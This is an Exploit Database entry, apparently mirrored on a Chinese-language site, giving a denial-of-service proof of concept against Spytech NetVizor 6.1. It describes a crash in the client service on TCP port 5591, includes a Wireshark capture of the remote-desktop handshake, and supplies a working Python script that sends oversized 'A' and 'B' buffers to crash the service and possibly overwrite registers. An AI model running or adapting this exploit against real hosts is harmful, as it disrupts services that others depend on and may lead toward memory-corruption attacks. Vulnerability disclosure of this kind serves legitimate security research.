Spytech NetVizor 6.1 – ‘services.exe’ Denial of Service

• Exploit Database
• 37 阅读

• 作者： loneferret
  日期： 2012-08-12
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/20464/

• # Author: loneferret of Offensive Security
  # Product: Spytech VetVizor
  # Version: Build Release 6.1
  # Vendor Site: hhttp://www.spytech-web.com/
  # Software Download: http://www.spytech-web.com/download.shtml#netvizor
  
  
  # Descriptions:
  # NetVizor is the latest in network monitoring software. Monitor your entire network from 
  # one centralized location! NetVizor allows you to track workstations and individual users
  # that may use multiple PC's on a network. NetVizor records everything users do - from keystrokes 
  # typed to email activity. NetVizor can show you what everyone is doing on your 
  # network, in real-time, with a single mouse click via its visual network overview and 
  # real-time activity ticker. 
  
  # NetVizor Client DoS:
  # Using the NetVizor "Viewer", the administrator can initiate a "RDP" like connection to a 
  # client workstation with the NetVizor "Client" installed. The port used on the client
  # host is 5591, which listens on all interfaces by default. This port is also used by the
  # "Viewer" application to grab screenshots of monitored hosts.
  # It's possible to have the service crash by sending an overly large string. And it some
  # cases this will will overwrite EAX or ECX. Regardless if the registers are overwritten
  # or not, the "Viewer" application will no longer be able to initiate a remote desktop
  # connection nor will it be able to grab a screen capture.
  
  # Wireshark capture:
  # This snip is from a successful connection between the "Viewer" application and the client
  # when initiating it's Remote Desktop session. Converting this to HEX and using it in our
  # PoC actually triggers it, unfortunately with no proper listener nothing really happens.
  #+From the Viewer
  #launchremotedesktop
  # .r...\Yv.r..+..r .
  # x.......r...r........-.......|...h........r.....r....-.......|....s...r..$..r,s...s.....r,s.....r...
  # ........h............s...SYvQ..
  # ....h...w/.w...v..............2..........SYv...r...r..5.....-............s..Hk..h...
  
  #+From client
  # Remote desktop started: C:\PROGRA~1\nvclient\rds.exe
  
  #+And the above as seen from Wireshark.
  launchremotedesktop
  .r...\Yv.r..+..r .
  x.......r...r........-.......|...h........r.....r....-.......|....s...r..$..r,s...s.....r,s.....r...
  ........h............s...SYvQ..
  ....h...w/.w...v..............2..........SYv...r...r..5.....-............s..Hk..h...Remote desktop started: C:\PROGRA~1\nvclient\rds.exe
  
  # PoC:
  # In the following script, when EAX or ECX is overwritten it will be with the 'B's.
  # As always, if someone wants to investigate further go right ahead. 
  # Just be nice.
  
  #!/usr/bin/python
  
  import socket
  
  buffer1= "[AAAA]"* 500
  buffer2= "BBBB"* 6000
  
  print "\nSending buffer 1"
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect(('xxx.xxx.xxx.xxx',5591))
  s.send(buffer1)
  s.close()
  
  raw_input()
  
  print "\nSending buffer 2"
  s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s2.connect(('xxx.xxx.xxx.xxx',5591))
  s2.send(buffer2)
  s2.close()